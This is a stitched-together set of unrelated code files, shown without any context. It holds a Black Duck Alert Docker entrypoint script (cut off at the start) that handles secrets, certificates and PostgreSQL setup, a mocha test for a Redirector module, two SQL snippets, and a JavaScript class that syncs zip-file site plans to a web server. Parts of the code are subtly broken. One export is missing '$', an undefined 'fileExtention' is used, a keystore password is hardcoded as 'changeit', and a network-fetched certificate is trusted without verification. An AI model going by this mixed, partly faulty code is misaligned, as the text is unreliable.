$dockerSecretDir/ALERT_TRUST_STORE_PASSWORD ]; then echo "Trust Store secret set; using value from secret." truststorePassword=$(cat $dockerSecretDir/ALERT_TRUST_STORE_PASSWORD | xargs echo) fi if [ -e $dockerSecretDir/ALERT_KEY_STORE_PASSWORD ]; then echo "Key Store secret set; using value from secret." keystorePassword=$(cat $dockerSecretDir/ALERT_KEY_STORE_PASSWORD | xargs echo) fi if [ -e $dockerSecretDir/ALERT_DB_USERNAME ]; then echo "Alert Database user secret set; using value from secret." alertDatabaseUser=$(cat $dockerSecretDir/ALERT_DB_USERNAME | xargs echo) export ALERT_DB_USERNAME=$alertDatabaseUser; alertDatabaseAdminUser=$alertDatabaseUser; export ALERT_DB_ADMIN_USERNAME=$alertDatabaseAdminUser; echo "Alert Database user variable set to secret value." fi if [ -e $dockerSecretDir/ALERT_DB_PASSWORD ]; then echo "Alert Database password secret set; using value from secret." alertDatabasePassword=$(cat $dockerSecretDir/ALERT_DB_PASSWORD | xargs echo) export ALERT_DB_PASSWORD=$alertDatabasePassword; alertDatabaseAdminPassword=$alertDatabasePassword; export ALERT_DB_ADMIN_PASSWORD=$alertDatabaseAdminPassword; echo "Alert Database password variable set to secret value." fi if [ -e $dockerSecretDir/ALERT_DB_ADMIN_USERNAME ]; then echo "Alert Database admin user secret set; using value from secret." alertDatabaseAdminUser=$(cat $dockerSecretDir/ALERT_DB_ADMIN_USERNAME | xargs echo) export ALERT_DB_ADMIN_USERNAME=$alertDatabaseAdminUser; echo "Alert Database admin user variable set to secret value." fi if [ -e $dockerSecretDir/ALERT_DB_ADMIN_PASSWORD ]; then echo "Alert Database admin password secret set; using value from secret." alertDatabaseAdminPassword=$(cat $dockerSecretDir/ALERT_DB_ADMIN_PASSWORD | xargs echo) export ALERT_DB_ADMIN_PASSWORD=$alertDatabaseAdminPassword; echo "Alert Database admin password variable set to secret value." fi if [ -e $dockerSecretDir/ALERT_DB_SSL_KEY_PATH ]; then echo "Alert Database SSL key set; using value from secret." alertDatabaseSslKey=$dockerSecretDir/ALERT_DB_SSL_KEY_PATH export ALERT_DB_SSL_KEY_PATH=$alertDatabaseSslKey echo "Alert Database SSL key variable set to secret value." fi if [ -e $dockerSecretDir/ALERT_DB_SSL_CERT_PATH ]; then echo "Alert Database SSL key set; using value from secret." alertDatabaseSslCert=$dockerSecretDir/ALERT_DB_SSL_CERT_PATH export ALERT_DB_SSL_CERT_PATH=$alertDatabaseSslCert echo "Alert Database SSL cert variable set to secret value." fi if [ -e $dockerSecretDir/ALERT_DB_SSL_ROOT_CERT_PATH ]; then echo "Alert Database SSL key set; using value from secret." alertDatabaseSslRootCert=$dockerSecretDir/ALERT_DB_SSL_ROOT_CERT_PATH export ALERT_DB_SSL_ROOT_CERT_PATH=alertDatabaseSslRootCert echo "Alert Database SSL root cert variable set to secret value." fi alertDatabaseAdminConfig="host=$alertDatabaseHost port=$alertDatabasePort dbname=$alertDatabaseName user=$alertDatabaseAdminUser password=$alertDatabaseAdminPassword sslmode=$alertDatabaseSslMode sslkey=$alertDatabaseSslKey sslcert=$alertDatabaseSslCert sslrootcert=$alertDatabaseSslRootCert" alertDatabaseConfig="host=$alertDatabaseHost port=$alertDatabasePort dbname=$alertDatabaseName user=$alertDatabaseUser password=$alertDatabasePassword sslmode=$alertDatabaseSslMode sslkey=$alertDatabaseSslKey sslcert=$alertDatabaseSslCert sslrootcert=$alertDatabaseSslRootCert" echo "Alert max heap size: $ALERT_MAX_HEAP_SIZE" echo "Certificate authority host: $targetCAHost" echo "Certificate authority port: $targetCAPort" createCertificateStoreDirectory() { echo "Checking certificate store directory" if [ -d $securityDir ]; then echo "Certificate store directory $securityDir exists" else mkdir -p -v $securityDir fi } manageRootCertificate() { $certificateManagerDir/certificate-manager.sh root \ --ca $targetCAHost:$targetCAPort \ --outputDirectory $securityDir \ --profile peer } manageSelfSignedServerCertificate() { echo "Attempting to generate $APPLICATION_NAME self-signed server certificate and key." $certificateManagerDir/certificate-manager.sh server-cert \ --ca $targetCAHost:$targetCAPort \ --rootcert $securityDir/root.crt \ --key $securityDir/$serverCertName.key \ --cert $securityDir/$serverCertName.crt \ --outputDirectory $securityDir \ --commonName $serverCertName \ --san $targetWebAppHost \ --san $alertHostName \ --san localhost \ --hostName $targetWebAppHost exitCode=$? if [ $exitCode -eq 0 ]; then echo "Generated $APPLICATION_NAME self-signed server certificate and key." chmod 644 $securityDir/root.crt chmod 400 $securityDir/$serverCertName.key chmod 644 $securityDir/$serverCertName.crt else echo "ERROR: Unable to generate $APPLICATION_NAME self-signed server certificate and key (Code: $exitCode)." exit $exitCode fi } manageBlackduckSystemClientCertificate() { echo "Attempting to generate blackduck_system client certificate and key." $certificateManagerDir/certificate-manager.sh client-cert \ --ca $targetCAHost:$targetCAPort \ --outputDirectory $securityDir \ --commonName blackduck_system exitCode=$? if [ $exitCode -eq 0 ]; then chmod 400 $securityDir/blackduck_system.key chmod 644 $securityDir/blackduck_system.crt else echo "ERROR: Unable to generate blackduck_system certificate and key (Code: $exitCode)." exit $exitCode fi echo "Attempting to generate blackduck_system store." $certificateManagerDir/certificate-manager.sh keystore \ --outputDirectory $securityDir \ --outputFile blackduck_system.keystore \ --password changeit \ --keyAlias blackduck_system \ --key $securityDir/blackduck_system.key \ --cert $securityDir/blackduck_system.crt exitCode=$? if [ $exitCode -ne 0 ]; then echo "ERROR: Unable to generate blackduck_system store (Code: $exitCode)." exit $exitCode fi echo "Attempting to trust root certificate within the blackduck_system store." $certificateManagerDir/certificate-manager.sh trust-java-cert \ --store $securityDir/blackduck_system.keystore \ --password changeit \ --cert $securityDir/root.crt \ --certAlias blackduck_root exitCode=$? if [ $exitCode -ne 0 ]; then echo "ERROR: Unable to trust root certificate within the blackduck_system store (Code: $exitCode)." exit $exitCode fi } createTruststore() { if [ -f $dockerSecretDir/jssecacerts ]; then echo "Custom jssecacerts file found." echo "Copying file jssecacerts to the certificate location" cp $dockerSecretDir/jssecacerts $securityDir/$APPLICATION_NAME.truststore elif [ -f $dockerSecretDir/cacerts ]; then echo "Custom cacerts file found." echo "Copying file cacerts to the certificate location" cp $dockerSecretDir/cacerts $securityDir/$APPLICATION_NAME.truststore else echo "Attempting to copy Java cacerts to create truststore." $certificateManagerDir/certificate-manager.sh truststore --outputDirectory $securityDir --outputFile $APPLICATION_NAME.truststore exitCode=$? if [ ! $exitCode -eq 0 ]; then echo "Unable to create truststore (Code: $exitCode)." exit $exitCode fi fi } trustRootCertificate() { $certificateManagerDir/certificate-manager.sh trust-java-cert \ --store $truststoreFile \ --password $truststorePassword \ --cert $securityDir/root.crt \ --certAlias hub-root exitCode=$? if [ $exitCode -eq 0 ]; then echo "Successfully imported BlackDuck root certificate into Java truststore." else echo "Unable to import BlackDuck root certificate into Java truststore (Code: $exitCode)." exit $exitCode fi } trustBlackDuckSystemCertificate() { $certificateManagerDir/certificate-manager.sh trust-java-cert \ --store $truststoreFile \ --password $truststorePassword \ --cert $securityDir/blackduck_system.crt \ --certAlias blackduck_system exitCode=$? if [ $exitCode -eq 0 ]; then echo "Successfully imported BlackDuck root certificate into Java truststore." else echo "Unable to import BlackDuck root certificate into Java truststore (Code: $exitCode)." exit $exitCode fi } trustProxyCertificate() { proxyCertificate="$dockerSecretDir/HUB_PROXY_CERT_FILE" if [ ! -f "$dockerSecretDir/HUB_PROXY_CERT_FILE" ]; then echo "WARNING: Proxy certificate file is not found in secret. Skipping Proxy Certificate Import." else $certificateManagerDir/certificate-manager.sh trust-java-cert \ --store $truststoreFile \ --password $truststorePassword \ --cert $proxyCertificate \ --certAlias proxycert exitCode=$? if [ $exitCode -eq 0 ]; then echo "Successfully imported proxy certificate into Java truststore." else echo "Unable to import proxy certificate into Java truststore (Code: $exitCode)." fi fi } createKeystore() { certKey=$securityDir/$serverCertName.key certFile=$securityDir/$serverCertName.crt if [ -f $dockerSecretDir/WEBSERVER_CUSTOM_CERT_FILE ] && [ -f $dockerSecretDir/WEBSERVER_CUSTOM_KEY_FILE ]; then certKey="${dockerSecretDir}/WEBSERVER_CUSTOM_KEY_FILE" certFile="${dockerSecretDir}/WEBSERVER_CUSTOM_CERT_FILE" echo "Custom webserver cert and key found" echo "Using $certFile and $certKey for webserver" fi # Create the keystore with given private key and certificate. echo "Attempting to create keystore." $certificateManagerDir/certificate-manager.sh keystore \ --outputDirectory $securityDir \ --outputFile $keyStoreFile \ --password $keystorePassword \ --keyAlias $APPLICATION_NAME \ --key $certKey \ --cert $certFile exitCode=$? if [ $exitCode -eq 0 ]; then chmod 644 $keystoreFilePath else echo "Unable to create keystore (Code: $exitCode)." exit $exitCode fi } importBlackDuckSystemCertificateIntoKeystore() { $certificateManagerDir/certificate-manager.sh trust-java-cert \ --store $keystoreFilePath \ --password $keystorePassword \ --cert $securityDir/blackduck_system.crt \ --certAlias blackduck_system exitCode=$? if [ $exitCode -eq 0 ]; then echo "Successfully imported BlackDuck system certificate into Java keystore." else echo "Unable to import BlackDuck system certificate into Java keystore (Code: $exitCode)." exit $exitCode fi } # Bootstrap will optionally configure the config volume if it hasnt been configured yet. # After that we verify, and then launch the webserver. importDockerHubServerCertificate(){ if keytool -list -keystore "$truststoreFile" -storepass $truststorePassword -alias "hub.docker.com" then echo "The Docker Hub certificate is already imported." else if keytool -printcert -rfc -sslserver "hub.docker.com" -v | keytool -importcert -keystore "$truststoreFile" -storepass $truststorePassword -alias "hub.docker.com" -noprompt then echo "Completed importing Docker Hub certificate." else echo "Unable to add the Docker Hub certificate. Please try to import the certificate manually." fi fi } liquibaseChangelockReset() { echo "Begin releasing liquibase changeloglock." $JAVA_HOME/bin/java -cp "$alertHome/alert-tar/lib/liquibase/*" \ liquibase.integration.commandline.Main \ --url="jdbc:h2:file:$alertDatabaseDir" \ --username="sa" \ --password="" \ --driver="org.h2.Driver" \ --changeLogFile="$upgradeResourcesDir/release-locks-changelog.xml" \ releaseLocks echo "End releasing liquibase changeloglock." } validatePostgresConnection() { # Since the database is now external to the alert container verify we can connect to the database before starting. # https://stackoverflow.com/a/58784528/6921621 echo "Checking for postgres connectivity... " if psql "${alertDatabaseConfig}" -c '\l' > /dev/null; then echo "Alert postgres database connection valid." else echo "Alert postgres connection cannot be made." sleep 10 exit 1 fi } createPostgresDatabase() { # Since the database is now external to the alert container check if the database, schema, and tables have been created for alert. # https://stackoverflow.com/a/58784528/6921621 echo "Checking if $alertDatabaseName exists... " if psql "${alertDatabaseConfig}" -c '\l' |grep -q "$alertDatabaseName"; then echo "Alert postgres database exists." if psql "${alertDatabaseConfig}" -c '\dt ALERT.*' |grep -q 'field_values'; then echo "Alert postgres database tables have been successfully created." else echo "Alert postgres database tables have not been created. Creating database tables for database: $alertDatabaseName " psql "${alertDatabaseConfig}" -f ${upgradeResourcesDir}/init_alert_db.sql fi else echo "Alert postgres database does not exist. Please create the database: $alertDatabaseName" sleep 10 exit 1 fi } validatePostgresDatabase() { # https://stackoverflow.com/a/58784528/6921621 echo "Checking for postgres databases... " if psql "${alertDatabaseConfig}" -c '\l' | grep -q "$alertDatabaseName"; then echo "Alert postgres database exists." if psql "${alertDatabaseConfig}" -c '\dt ALERT.*' |grep -q 'field_values'; then echo "Alert postgres database tables have been successfully created." else echo "Alert postgres database tables have not been created." sleep 10 exit 1 fi else echo "Alert postgres database does not exist." sleep 10 exit 1 fi } postgresPrepare600Upgrade() { echo "Determining if preparation for 6.0.0 upgrade is necessary..." if psql "${alertDatabaseConfig}" -c 'SELECT COUNT(CONTEXT) FROM Alert.Config_Contexts;' | grep -q '2'; then echo "Alert postgres database is initialized." else echo "Preparing the old Alert database to be upgraded to 6.0.0..." if [ -f "${alertDataDir}/alertdb.mv.db" ]; then echo "A previous database existed." liquibaseChangelockReset echo "Clearing old checksums for offline upgrade..." ${JAVA_HOME}/bin/java -cp "$alertHome/alert-tar/lib/liquibase/*" \ liquibase.integration.commandline.Main \ --url="jdbc:h2:file:${alertDatabaseDir}" \ --username="sa" \ --password="" \ --driver="org.h2.Driver" \ --changeLogFile="${upgradeResourcesDir}/changelog-master.xml" \ clearCheckSums echo "Upgrading old database to 5.3.0 so that it can be properly exported..." ${JAVA_HOME}/bin/java -cp "$alertHome/alert-tar/lib/liquibase/*" \ liquibase.integration.commandline.Main \ --url="jdbc:h2:file:${alertDatabaseDir}" \ --username="sa" \ --password="" \ --driver="org.h2.Driver" \ --changeLogFile="${upgradeResourcesDir}/changelog-master.xml" \ update echo "Creating temp directory for data migration..." mkdir ${alertConfigHome}/data/temp chmod 766 ${alertConfigHome}/data/temp echo "Exporting data from old database..." $JAVA_HOME/bin/java -cp "${alertHome}/alert-tar/lib/liquibase/*" \ org.h2.tools.RunScript \ -url "jdbc:h2:${alertDatabaseDir}" \ -user "sa" \ -password "" \ -driver "org.h2.Driver" \ -script ${upgradeResourcesDir}/export_h2_tables.sql chmod 766 ${alertConfigHome}/data/temp/* echo "Importing data from old database into new database..." psql "${alertDatabaseConfig}" -f ${upgradeResourcesDir}/import_postgres_tables.sql else echo "No previous database existed." fi fi } createPostgresExtensions() { echo "Creating required postgres extensions." psql "${alertDatabaseAdminConfig}" -f ${upgradeResourcesDir}/create_extension.sql } if [ ! -f "$certificateManagerDir/certificate-manager.sh" ]; then echo "ERROR: certificate management script is not present." sleep 10 exit 1; else validatePostgresConnection createCertificateStoreDirectory if [ -f $secretsMountPath/WEBSERVER_CUSTOM_CERT_FILE ] && [ -f $secretsMountPath/WEBSERVER_CUSTOM_KEY_FILE ]; then echo "Custom webserver cert and key found" manageRootCertificate else manageSelfSignedServerCertificate fi manageBlackduckSystemClientCertificate createTruststore trustRootCertificate trustBlackDuckSystemCertificate trustProxyCertificate createKeystore importBlackDuckSystemCertificateIntoKeystore importDockerHubServerCertificate createPostgresDatabase validatePostgresDatabase postgresPrepare600Upgrade createPostgresExtensions liquibaseChangelockReset if [ -f "$truststoreFile" ]; then JAVA_OPTS="$JAVA_OPTS -Xmx$ALERT_MAX_HEAP_SIZE -Djavax.net.ssl.trustStore=$truststoreFile" export JAVA_OPTS fi fi exec "$@"
'use strict'; const request = require('superagent'); const Redirector = require('./redirector'); describe('Redirector', () => { let revision; let defaultConfig; let expectedResult; let postStub; let sendStub; let setStub; let requestStub; beforeEach(() => { revision = 13; defaultConfig = { redirector: { url: 'https://test_url', name: 'test_name', revision, target: 'test.target.com', apiSecret: 'test_api_secret' } }; expectedResult = 'test_result'; postStub = sinon.stub(request, 'post'); sendStub = sinon.stub(); setStub = sinon.stub(); requestStub = { send: sendStub, set: setStub }; for (let stub of [sendStub, postStub]) { stub.returns(requestStub); } setStub.onFirstCall().returns(requestStub); setStub.onCall(1).returns(Promise.resolve(expectedResult)); }); afterEach(() => { request.post.restore(); }); describe('#save', () => { it('should send request to the redirector service with the proper arguments', async () => { const config = Object.assign({}, defaultConfig); const result = await Redirector.save(config, revision); expect(postStub).to.be.calledWith('https://test_url/api/route'); expect(sendStub).to.be.calledWith({ name: 'test_name', revision, target: 'test.target.com/' + revision }); expect(setStub).to.have.calledWith('Accept', 'application/json'); expect(setStub).to.have.calledWith('x-auth', 'test_api_secret'); expect(result).to.eql(expectedResult); }); it('should send request to the redirector service with project suffix when given', async () => { const config = Object.assign({ projectName: 'myProjectName' }, defaultConfig); const result = await Redirector.save(config, revision); expect(postStub).to.be.calledWith('https://test_url/api/route'); expect(sendStub).to.be.calledWith({ name: 'test_name', revision, target: 'test.target.com/myProjectName/' + revision }); expect(setStub).to.have.calledWith('Accept', 'application/json'); expect(setStub).to.have.calledWith('x-auth', 'test_api_secret'); expect(result).to.eql(expectedResult); }); }); });
SET ECHO OFF SET VERIFY OFF SELECT product_id, product_type_id, name, price FROM products WHERE product_type_id = &1 AND price > &2;
SELECT City, COUNT(*) FROM Customers GROUP BY City
'use strict'; import { COL } from "../COL.js"; import { Model } from "../core/Model.js"; import { Layer } from "../core/Layer.js"; import { BlobInfo } from "../core/BlobInfo.js"; import { ApiService } from "../core/ApiService.js"; import "../core/Core.js"; import { ImageInfo } from "../core/ImageInfo.js"; import { ZipLoader } from "../../static/ZipLoader.module.js"; import { PlanInfo } from "../util/PlanInfo.js"; import { Scene3DtopDown } from "../core/Scene3DtopDown.js"; import "../util/Util.js"; import "../util/Util.AssociativeArray.js"; import "../util/ErrorHandlingUtil.js"; import { FileZipUtils } from "./FileZipUtils.js"; class FileZip_withJson { constructor(name, planInfo){ this.openedZipFileList = new COL.util.AssociativeArray(); this.sitesInfo_inFileZip = new COL.util.AssociativeArray(); this.sitesFilesInfo = {}; this.sitesFilesInfo["sites"] = {}; this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"] = new COL.util.AssociativeArray(); this.layerJsonFilenames = []; this.modelVersionInZipFile = undefined; }; saveFromWebServerToZipFile_viaRegularZip2 = function (groupId) { return FileZipUtils.saveFromWebServerToZipFile_viaRegularZip(groupId); }; setModelVersionInZipFile = function(modelVersionInZipFile) { this.modelVersionInZipFile = modelVersionInZipFile; }; isSiteValidForUpload = async function (siteInfo_inFileZip) { // console.log('BEG isSiteValidForUpload'); ///////////////////////////////////////////// // Check if the site is valid to be uploaded to the website ///////////////////////////////////////////// let getSiteByNameResultAsJson = await COL.model.getSiteByName(siteInfo_inFileZip.siteName); let retval1 = { retval: false, siteInfo_inBackend: {} }; if(getSiteByNameResultAsJson.name) { let siteInfo = COL.model.createSiteInfoFromJson(getSiteByNameResultAsJson, this.modelVersionInZipFile) retval1['retval'] = true; retval1['siteInfo_inBackend'] = siteInfo; } else { console.log('File is invalid for upload'); } return retval1; } syncZipSitePlanEntryWithWebServer2 = async function (plan_inFileZip) { console.log('BEG syncZipSitePlanEntryWithWebServer2'); ///////////////////////////////////////////// // Do xxx ///////////////////////////////////////////// let retval = true; let planInfo = plan_inFileZip; let getPlanBySiteAndPlanNamesResultAsJson = await FileZipUtils.getPlanBySiteAndPlanNames(planInfo) if(getPlanBySiteAndPlanNamesResultAsJson.plan_name) { // A plan with the planInfo.siteName and planInfo.name already exists // Update the existing sitePlan with content from the sitePlan in the zip file let siteName = getPlanBySiteAndPlanNamesResultAsJson.site_name; let msgStr = 'siteName: ' + siteName + ', plan_name: ' + getPlanBySiteAndPlanNamesResultAsJson.plan_name + ' already exists for the user. Update the existing sitePlan with content from the sitePlan in the zip file'; planInfo.newSiteId = getPlanBySiteAndPlanNamesResultAsJson.site_id; planInfo.newPlanId = getPlanBySiteAndPlanNamesResultAsJson.plan_id; } else { // A plan with the planInfo.siteName and planInfo.name does NOT exists for the user // create a new sitePlan with content from the sitePlan in the zip file let msgStr = 'siteName: ' + planInfo.siteName + ', plan_name: ' + planInfo.name + ' do NOT exist for the user. Create a new sitePlan with content from the sitePlan in the zip file'; let addNewPlanResultAsJson = await FileZip_withJson.addNewPlan(planInfo); planInfo.newSiteId = addNewPlanResultAsJson.site_id; planInfo.newPlanId = addNewPlanResultAsJson.plan_id; } return retval; }; syncZipSitePlanFilesWithWebServer2 = async function (plan_inFileZip) { // console.log('BEG syncZipSitePlanFilesWithWebServer2'); try { let retval = true; COL.model.image_db_operations_array = []; ///////////////////////////////////////////// // getLayerByPlanInfo ///////////////////////////////////////////// let syncRetVals = []; let layer = COL.model.getLayerByPlanInfo(plan_inFileZip); if(COL.util.isObjectInvalid(layer)) { // sanity check console.error('plan_inFileZip', plan_inFileZip); console.error('layer is invalid for plan_inFileZip'); retval = false; return retval; } let imagesInfo = layer.getImagesInfo(); let planInfo = layer.getPlanInfo(); let path = planInfo.siteId + '/' + planInfo.id; let imageFilenames = imagesInfo.getValues(); ///////////////////////////////////////////// // clear all blobsUrls of the current zipfile layer // before uploading the files to the webserver // this helps preventing "out of memory" errors ///////////////////////////////////////////// console.log('clear all blobsUrls'); for (let filename in imageFilenames) { let imageInfo = imagesInfo.getByKey(filename); let blobInfo = imageInfo.blobInfo; if(COL.util.isObjectInvalid(blobInfo)) { // sanity check console.error('blobInfo is invalid for filename: ', filename); } let filenameFullPath = blobInfo.dirname + '/' + blobInfo.filename; // clear the memory via revokeObjectURL() // mark the "buffer" as empty and "url" as null to indicate that the blob is no longer in memory // the buffer and url is the same in blobInfo.blobUrl if(COL.util.isObjectValid(blobInfo.blobUrl)) { // console.log('revokeObjectURL for blobInfo.blobUrl'); URL.revokeObjectURL(blobInfo.blobUrl); blobInfo.blobUrl = null; } let zipFileInfo = COL.model.getZipFileInfo(); zipFileInfo.files[filenameFullPath].buffer = null; zipFileInfo.files[filenameFullPath].url = null; } //////////////////////////////////////////////////////////////////////////////////// // sync files of the current zipfile layer // optionally save the files to to the file system // (and defer the save to the db, to a separate step - see below) //////////////////////////////////////////////////////////////////////////////////// // sync images await this.syncFilesOfTheCurrentZipFileLayer2(planInfo, imagesInfo, imageFilenames, syncRetVals); let metaDataFilesInfo = layer.getMetaDataFilesInfo(); let metaDataFilenames = metaDataFilesInfo.getValues(); // sync metadata (e.g. .json) await this.syncFilesOfTheCurrentZipFileLayer2(planInfo, metaDataFilesInfo, metaDataFilenames, syncRetVals); ////////////////////////////////////////////////////// // Check if the sync was successful ////////////////////////////////////////////////////// let allFilesSyncStatus = true; let msgStr = "List of files that were not synced: "; syncRetVals.forEach(function(syncRetVal){ // console.log(syncRetVal); if(!syncRetVal['syncStatus']) { allFilesSyncStatus = false; let msgStr1 = "filePath: " + syncRetVal['filePath'] + ", syncStatus: " + syncRetVal['syncStatus'] + "<br /><br />"; msgStr = msgStr + msgStr1; } }); //////////////////////////////////////////////////////////////////////////////////// // sync files of the current zipfile layer // optionally save the files to to the db in a separate step //////////////////////////////////////////////////////////////////////////////////// if(allFilesSyncStatus) { // insert/update/delete from the database with the new/updated/deleted images let jsonData = {image_db_operations_array: COL.model.image_db_operations_array}; let jsonDataAsStr = JSON.stringify(jsonData); const formData = new FormData(); formData.append('json_data_as_str', jsonDataAsStr); let headersData = { 'X-CSRF-Token': COL.model.csrf_token }; let fetchData = { method: 'POST', headers: headersData, body: formData }; // queryUrl - e.g. http://192.168.1.74/api/v1_2/insert_update_delete_images_in_db let queryUrl = COL.model.getUrlBase() + 'api/v1_2/insert_update_delete_images_in_db'; let response = await fetch(queryUrl, fetchData); await COL.errorHandlingUtil.handleErrors(response); } if(allFilesSyncStatus) { msgStr = "All files were synced!"; } console.log('msgStr', msgStr); return retval; } catch (err) { console.error('err', err); throw new Error('Error from syncZipSitePlanFilesWithWebServer2'); } }; syncFilesOfTheCurrentZipFileLayer2 = async function (planInfo, filesInfo, filenames, syncRetVals) { // console.log('BEG syncFilesOfTheCurrentZipFileLayer2'); console.log('sync files to webserver'); let counter = 0; const reportEveryNumFiles = 10; let sitesInfo = COL.model.getSitesInfo(); let filenamesLength = Object.keys(filenames).length; for (let filename in filenames) { counter += 1; if(counter % reportEveryNumFiles == 0) { let msgStr = counter + " of: " + filenamesLength; console.log(msgStr); } let fileInfo = filesInfo.getByKey(filename); let blobInfo = fileInfo.blobInfo; if(COL.util.isObjectInvalid(blobInfo)) { // sanity check console.error('blobInfo is invalid'); } let filenameFullPath = blobInfo.dirname + '/' + blobInfo.filename; if(COL.util.isObjectInvalid(blobInfo.blobUrl)) { // https://www.joji.me/en-us/blog/processing-huge-files-using-filereader-readasarraybuffer-in-web-browser/ // tbd - maybe only open the zip file and read specific file for big files, and for small files e.g. < 100B keep the Model::_zipFileArrayBuffer ?? // // The file is not yet in memory, but its offset is stored in memory. // Unzip the image file data await FileZip_withJson.readZipEntryData(filenameFullPath) blobInfo = await this.addBlobToFilesInfo(filenameFullPath, filesInfo); // sanity test let response = await fetch(blobInfo.blobUrl); if (!response.ok) { console.log('Error from syncFilesOfThe CurrentZipFileLayer. Error fetching blobInfo.blobUrl'); } } let syncRetVal = await this.syncZipFileBlobWithWebServer2(planInfo, blobInfo); // ZipLoader.clear() clears the entire file entry, // i.e. the buffer (which we may want to clear to conserve memory), // but also the header attributes (offsetInZipFile, compressedSize, etc...) which we want to preserve // so don't call "ZipLoader.clear()" if(COL.util.isObjectValid(blobInfo.blobUrl)) { // console.log('revokeObjectURL for blobInfo.blobUrl'); URL.revokeObjectURL(blobInfo.blobUrl); blobInfo.blobUrl = null; } // mark the "buffer" as empty and "url" as null to indicate that the blob is no longer in memory // the buffer and url is the same in blobInfo.blobUrl, which is released above // (the memory is cleared via "revokeObjectURL(blobInfo.blobUrl)" let zipFileInfo = COL.model.getZipFileInfo(); zipFileInfo.files[filenameFullPath].buffer = ""; // console.log('revokeObjectURL for zipFileInfo.files[filenameFullPath].url'); // URL.revokeObjectURL(zipFileInfo.files[filenameFullPath].url); zipFileInfo.files[filenameFullPath].url = null; syncRetVals.push(syncRetVal); } }; syncZipFileBlobWithWebServer2 = async function (planInfo, blobInfo) { let filename = blobInfo.filename; // sanity check if(COL.util.isObjectInvalid(blobInfo.blobUrl)) { // At this point the blob should be in memory console.log('blobInfo.filename', blobInfo.filename); console.log('blobInfo.dirname', blobInfo.dirname); throw new Error('Invalid blobInfo.blobUrl'); } let syncRetVal = {}; syncRetVal["filePath"] = filename; syncRetVal["syncStatus"] = false; let fileType = COL.util.getFileTypeFromFilename(filename); switch(fileType) { case "mtl": case "obj": case "jpg": case "png": case "json": { // blobInfo.isDirty = true; // await blobInfo.syncBlobToWebServer(sitesInfo); // blobInfo.isDirty = false; // add layer.json // verify that the dirname matches the path pattern: siteId/planId let matchResults = blobInfo.dirname.match( /(\d+)\/(\d+)/i ); if(matchResults) { blobInfo.isDirty = true; // extract siteId, planId from sitesInfo and filePathOrig stripped from siteId/planId let retVal = Layer.GetSiteIdPlanIdAndFilePath(planInfo); let siteId = retVal['siteId']; let planId = retVal['planId']; let filePath = retVal['filePath']; let doDeferFileSystemAndDbSync = false; syncRetVal = await blobInfo.syncBlobToWebServer(siteId, planId, filePath, doDeferFileSystemAndDbSync); blobInfo.isDirty = false; } else { console.error("Failed to match blobInfo.dirname"); console.log('blobInfo', blobInfo); console.log('matchResults', matchResults); } break; } default: { console.error("File extention is not supported", fileExtention); break; } } return syncRetVal; }; syncZipSitePlanWithWebServer2 = async function (plan_inFileZip) { console.log('BEG syncZipSitePlanWithWebServer2'); // Sync the plan entry in the database // if the plan is not already in the db, create a new plan entry let retval1 = await this.syncZipSitePlanEntryWithWebServer2(plan_inFileZip); let retval2 = false; if(retval1) { // Upload the plan related files to the webserver (persist in the database, and upload to the file system) retval2 = await this.syncZipSitePlanFilesWithWebServer2(plan_inFileZip); } return retval2; }; syncZipSiteWithWebServer2 = async function (siteInfo_inFileZip, siteInfo_inBackend) { console.log('BEG syncZipSiteWithWebServer2'); /////////////////////////////////////////// // delete the old site /////////////////////////////////////////// // @bp.route('/admin/delete/site/<site_id>', methods=['DELETE']) // @bp.route('/admin/delete/site/<site_id>', methods=['POST']) // https://localhost/api/v1_2/admin/delete/site/71 let queryUrl = COL.model.getUrlBase() + 'api/v1_2/admin/delete/site/' + siteInfo_inBackend.siteId; let fetchData = { method: 'GET' // method: 'DELETE' // method: 'POST' }; // queryUrl - e.g. http://192.168.1.74/api/v1_2/admin/delete/site/47 let response = await fetch(queryUrl, fetchData); await COL.errorHandlingUtil.handleErrors(response); ///////////////////////////////////////////// // Sync the site from the .zip file ///////////////////////////////////////////// let retval = false; let iter = siteInfo_inFileZip.plans.iterator(); while (iter.hasNext()) { let plan_inFileZip = iter.next(); let retval2 = await this.syncZipSitePlanWithWebServer2(plan_inFileZip); retval = (retval || retval2); } return retval; }; syncZipSitesWithWebServer2 = async function () { console.log('BEG syncZipSitesWithWebServer2'); let retval1 = true; let syncZipSitesWithWebServer_statusStr = ""; let iter = this.sitesInfo_inFileZip.iterator(); while (iter.hasNext()) { let siteInfo_inFileZip = iter.next(); ///////////////////////////////////////////// // Check if the site is valid to be uploaded to the website ///////////////////////////////////////////// let siteName = siteInfo_inFileZip.siteName; let isSiteValidForUpload_results = await this.isSiteValidForUpload(siteInfo_inFileZip) if(isSiteValidForUpload_results.retval) { let retval_syncZipSiteWithWebServer2 = await this.syncZipSiteWithWebServer2(siteInfo_inFileZip, isSiteValidForUpload_results.siteInfo_inBackend); if(!retval_syncZipSiteWithWebServer2) { syncZipSitesWithWebServer_statusStr += (`Failed to sync site: ${siteName}\n`); } else { syncZipSitesWithWebServer_statusStr += (`Succeeded to sync site: ${siteName}\n`); } retval1 = (retval1 || retval_syncZipSiteWithWebServer2); } else { syncZipSitesWithWebServer_statusStr += (`Site is invalid for upload: ${siteName}\n`); retval1 = false; } } let retval3 = { retval: retval1, syncZipSitesWithWebServer_statusStr: syncZipSitesWithWebServer_statusStr } return retval3; }; // -------------------------------------------------------------- //////////////////////////////////////////////////////////////////////////// // We create sitesFilesInfo (multiple planImagesInfo, and planMetaDataFilesInfo) // from the zip file data, which refers to multiple site plans. // by sorting the specific file (filenameFullPath) to an entry in sitesFilesInfo (for a specific site_plan) // and by returning a reference to an entry in sitesFilesInfo (for a specific site_plan) // // Get the planImagesInfo, planMetaDataFilesInfo, origSiteId, origPlanId from sitesFilesInfo // for a specified filenameFullPath (which relates to a specific site plan) //////////////////////////////////////////////////////////////////////////// getFilesInfoForSpecifiedFilename = function (filenameFullPath) { // console.log('BEG getFilesInfoForSpecifiedFilename'); let pathElements = COL.util.getPathElements(filenameFullPath); let dirname = pathElements['dirname']; let filename = pathElements['filename']; let extension = pathElements['extension']; let isRegularFile = false; let planImagesInfo = undefined; let planMetaDataFilesInfo = undefined; let otherDataSharedBetweenAllSitePlans = undefined; let origSiteId = undefined; let origPlanId = undefined; if(extension) { origSiteId = 0; origPlanId = 0; let matchResults = dirname.match( /(\d+)\/(\d+).*/i ); if(matchResults) { origSiteId = matchResults[1]; origPlanId = matchResults[2]; if(!this.sitesFilesInfo["sites"][origSiteId]) { this.sitesFilesInfo["sites"][origSiteId] = {}; } 